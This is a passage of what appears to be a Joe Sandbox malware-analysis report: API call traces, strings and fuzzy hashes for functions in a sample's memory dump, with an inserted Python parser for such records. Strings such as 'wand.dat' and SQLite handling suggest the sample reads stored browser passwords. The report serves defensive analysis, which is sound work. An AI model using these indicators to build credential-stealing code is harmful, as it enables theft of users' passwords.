                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                                                                • API String ID: 2618321458-3614832568
                                                                                                                                                • Opcode ID: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                                                                • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                                                                                • Opcode Fuzzy Hash: 892276959a0c47848777e093024f27755814d5c903fce7db561a0975b0ee82c0
                                                                                                                                                • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AttributesFilefreememset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2507021081-0
                                                                                                                                                • Opcode ID: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                                                                                                • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                                                                                                                • Opcode Fuzzy Hash: afcad17dad9998b86119828d1b617f81507b1c6ffb5a90d063004130875e5eff
                                                                                                                                                • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                                                                                                                APIs
                                                                                                                                                • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                                                                                                                • malloc.MSVCRT ref: 00417524
                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                                                                                                                • free.MSVCRT ref: 00417544
                                                                                                                                                • free.MSVCRT ref: 00417562
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4131324427-0
                                                                                                                                                • Opcode ID: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                                                                                • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                                                                                                                • Opcode Fuzzy Hash: 5d21432bc65b929392c7d49bf17a02b877e07d349bc8417fbf8b7ee350a515ff
                                                                                                                                                • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                                                                                                                APIs
                                                                                                                                                • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                                                                                                                • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                                                                                                                • free.MSVCRT ref: 0041822B
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: PathTemp$free
                                                                                                                                                • String ID: %s\etilqs_$etilqs_
                                                                                                                                                • API String ID: 924794160-1420421710
                                                                                                                                                • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                                                                • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                                                                                                                • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                                                                                                                • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                                                                                                                APIs
                                                                                                                                                • wcscpy.MSVCRT ref: 0041477F
                                                                                                                                                • wcscpy.MSVCRT ref: 0041479A
                                                                                                                                                • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General), ref: 004147C1
                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: wcscpy$CloseCreateFileHandle
                                                                                                                                                • String ID: General
                                                                                                                                                • API String ID: 999786162-26480598
                                                                                                                                                • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                                                                • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                                                                                                                • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                                                                                                                                                • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
Similarity
• API ID: ErrorLastMessage_snwprintf
• String ID: Error$Error %d: %s
• API String ID: 313946961-1552265934
• Opcode ID: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
• Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
• Opcode Fuzzy Hash: a33dc607cfdbe5323d0e9dcae57c7c504b94496520966edc9fba833a94f57729
• Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59

Strings
• foreign key on %s should reference only one column of table %T, xrefs: 004316CD
• number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
• unknown column "%s" in foreign key definition, xrefs: 00431858
Memory Dump Source
• Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
Similarity
• API ID: memcpy
• String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
• API String ID: 3510742995-272990098
• Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
• Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
• Opcode Fuzzy Hash: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
• Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99

APIs
• memset.MSVCRT ref: 0044A6EB
• memset.MSVCRT ref: 0044A6FB
• memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
• memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
Memory Dump Source
• Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
Similarity
• API ID: memcpymemset
• String ID: gj
• API String ID: 1297977491-4203073231
• Opcode ID: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
• Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
• Opcode Fuzzy Hash: 33c29578f6527905f4abec1227faf2173c8a70e2811538addd66a8855e8dc5c8
• Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756

APIs
• AreFileApisANSI.KERNEL32 ref: 00417497
• WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
• malloc.MSVCRT ref: 004174BD
• WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
• free.MSVCRT ref: 004174E4
Memory Dump Source
• Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
Similarity
• API ID: ByteCharMultiWide$ApisFilefreemalloc
• String ID:
• API String ID: 4053608372-0
• Opcode ID: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
• Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
• Opcode Fuzzy Hash: 26b6d0d827bb447631a2da2f7ad9fad7d37cc7249bf214c4621a9d0d58d44de2
• Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9

APIs
• GetParent.USER32(?), ref: 0040D453
• GetWindowRect.USER32(?,?), ref: 0040D460
• GetClientRect.USER32(00000000,?), ref: 0040D46B
• MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
• SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
Memory Dump Source
• Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
Similarity
• API ID: Window$Rect$ClientParentPoints
• String ID:
• API String ID: 4247780290-0
• Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
• Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
• Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
• Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5

APIs
  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
• GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
• ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
• memset.MSVCRT ref: 004450CD
  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
• ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
  • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
  • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
  • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
  • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
• CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
Memory Dump Source
• Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
Similarity
• API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
• String ID:
• API String ID: 1471605966-0
• Opcode ID: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
• Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
• Opcode Fuzzy Hash: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
• Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD

APIs
• wcscpy.MSVCRT ref: 0044475F
• wcscat.MSVCRT ref: 0044476E
• wcscat.MSVCRT ref: 0044477F
• wcscat.MSVCRT ref: 0044478E
  • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
  • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
  • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
  • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
Memory Dump Source
• Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
Similarity
• API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
• String ID: \StringFileInfo\
• API String ID: 102104167-2245444037
• Opcode ID: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
• Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
• Opcode Fuzzy Hash: ab9a2aafb99aa2c2dc16e93ced4cdbf5d312534483fca915021789ec54b8a1ce
• Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69

APIs
• memset.MSVCRT ref: 004100FB
• memset.MSVCRT ref: 00410112
  • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
  • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
• _snwprintf.MSVCRT ref: 00410141
Memory Dump Source
• Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
Similarity
• API ID: memset$_snwprintf_wcslwrwcscpy
• String ID: </%s>
• API String ID: 3400436232-259020660
• Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
• Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
• Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
• Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99

APIs
• memset.MSVCRT ref: 0040D58D
• SetWindowTextW.USER32(?,?), ref: 0040D5BD
• EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
Memory Dump Source
• Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
Similarity
• API ID: ChildEnumTextWindowWindowsmemset
• String ID: caption
• API String ID: 1523050162-4135340389
• Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
• Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
• Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
• Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
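The function summaries above follow one fixed shape: an APIs list (with "Part of subcall function" entries for calls reached through callees), an optional Strings list with xrefs, the memory-dump source, and the Similarity block whose Opcode ID and fuzzy hashes are what an analyst pivots on to find the same function in other reports. The following Python, added here as an illustration and not part of the Joe Sandbox report or of Joe Sandbox's own tooling, parses records of this shape into structured objects so they can be indexed by Opcode ID, grouped by imported module, or searched by string. The sample text is abridged from the records on this page; all helper and class names are the example's own.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set, Tuple

# Constructed sample: two function records abridged from the report section (some lines dropped).
SAMPLE = """\
APIs
  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
• ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
• memset.MSVCRT ref: 004450CD
  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
• CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
Memory Dump Source
• Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
• String ID:
• Opcode ID: 2aed10359402c50519c1c236b6adb34ede6eedef97d485569bed8d1556fc9971
• Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
APIs
Strings
• foreign key on %s should reference only one column of table %T, xrefs: 004316CD
• unknown column "%s" in foreign key definition, xrefs: 00431858
Similarity
• API ID: memcpy
• String ID: foreign key on %s should reference only one column of table %T$unknown column "%s" in foreign key definition
• Opcode ID: e905bcb7075b3ffde12d97cbb86947b7ecee93158e4b53cf1fdf11e57d7b5828
• Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
"""

BULLET, HEADERS = "•", {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
API_RE = re.compile(r"^(?:Part of subcall function (?P<subcall>[0-9A-Fa-f]+):\s*)?"
                    r"(?P<name>[^.(\s]+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
STRING_RE = re.compile(r"^(?P<value>.*), xrefs: (?P<xref>[0-9A-Fa-f]+)$")

@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: int                       # call-site address
    subcall: Optional[int] = None  # callee address when the call is reached through a subcall

@dataclass
class FunctionRecord:
    apis: List[ApiCall] = field(default_factory=list)
    strings: List[Tuple[str, int]] = field(default_factory=list)  # (text, xref address)
    fields: Dict[str, str] = field(default_factory=dict)          # "Opcode ID", "Source File", ...

    @property
    def opcode_id(self) -> str:
        return self.fields.get("Opcode ID", "")

def parse_records(text: str) -> List[FunctionRecord]:
    """Split the flat report text into one FunctionRecord per analysed function."""
    records, current, section = [], FunctionRecord(), ""
    for raw in text.splitlines():
        line = raw.strip()
        if line in HEADERS:
            section = line
            continue
        if not line.startswith(BULLET):
            continue
        body = line[len(BULLET):].strip()
        if section == "APIs":
            m = API_RE.match(body)
            if m:
                args = m.group("args").split(",") if m.group("args") is not None else []
                sub = int(m.group("subcall"), 16) if m.group("subcall") else None
                current.apis.append(ApiCall(m.group("name"), m.group("module"), args, int(m.group("ref"), 16), sub))
        elif section == "Strings":
            m = STRING_RE.match(body)
            if m:
                current.strings.append((m.group("value"), int(m.group("xref"), 16)))
        else:  # "Key: value" lines under Memory Dump Source / Similarity
            key, _, value = body.partition(":")
            current.fields[key.strip()] = value.strip()
            if key.strip() == "Instruction Fuzzy Hash":  # last field of every record
                records.append(current)
                current, section = FunctionRecord(), ""
    if current.apis or current.strings or current.fields:  # keep a truncated trailing record
        records.append(current)
    return records

def index_by_opcode(records: List[FunctionRecord]) -> Dict[str, FunctionRecord]:
    return {r.opcode_id: r for r in records if r.opcode_id}

def imports_by_module(records: List[FunctionRecord]) -> Dict[str, Set[str]]:
    """API names grouped by module, subcall lines included."""
    out: Dict[str, Set[str]] = {}
    for r in records:
        for call in r.apis:
            out.setdefault(call.module, set()).add(call.name)
    return out

def find_by_string(records: List[FunctionRecord], needle: str) -> List[FunctionRecord]:
    """Records whose listed strings or String ID contain needle (case-insensitive)."""
    needle = needle.lower()
    return [r for r in records if needle in r.fields.get("String ID", "").lower()
            or any(needle in s.lower() for s, _ in r.strings)]
```

Calling `parse_records` on the text of one report and `index_by_opcode` on the result gives a dictionary keyed by Opcode ID; intersecting the key sets of two reports shows which functions they share, which is the same pivot the report's Similarity block is meant for, without needing Joe Sandbox's fuzzy-hash implementation. `find_by_string` is handy for locating the functions that carry the SQLite error strings seen in this section, which is where the browser-database reading logic can be expected to live.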
APIs
  • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
  • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
• CreateFontIndirectW.GDI32(?), ref: 00401156
• SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
• SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
Memory Dump Source
• Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
Similarity
• API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
• String ID: MS Sans Serif
• API String ID: 210187428-168460110
• Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
• Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
• Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                                                • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040560C
                                                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                  • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                  • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002,?,?,00402E6F), ref: 0040D24C
                                                                                                                                                  • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                  • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                  • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                  • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                                                  • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                                                  • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                                                  • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                                                  • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                                                                • String ID: *.*$dat$wand.dat
                                                                                                                                                • API String ID: 2618321458-1828844352
                                                                                                                                                • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                                                                • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                                                                                                                                                • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                                                                                                                                                • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 00412057
                                                                                                                                                  • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                                                                                                • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                                                                • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                                                                • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3550944819-0
                                                                                                                                                • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                                                • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                                                                                                                                                • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                                                                                                                                                • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                                                                                                                                                APIs
                                                                                                                                                • free.MSVCRT ref: 0040F561
                                                                                                                                                • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                                                                                                                                                • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy$free
                                                                                                                                                • String ID: g4@
                                                                                                                                                • API String ID: 2888793982-2133833424
                                                                                                                                                • Opcode ID: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                                                                                • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                                                                                                                                                • Opcode Fuzzy Hash: 37ff6d91120af751e53e18efb23c18060f8529393ff4323a563ff9c980eac345
                                                                                                                                                • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 004144E7
                                                                                                                                                  • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                                                                                                                                                  • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                                                                                                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                                                                                                                                                • memset.MSVCRT ref: 0041451A
                                                                                                                                                • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000010.00000002.2262655227.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_16_2_400000_DGlxtFUfY.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1127616056-0
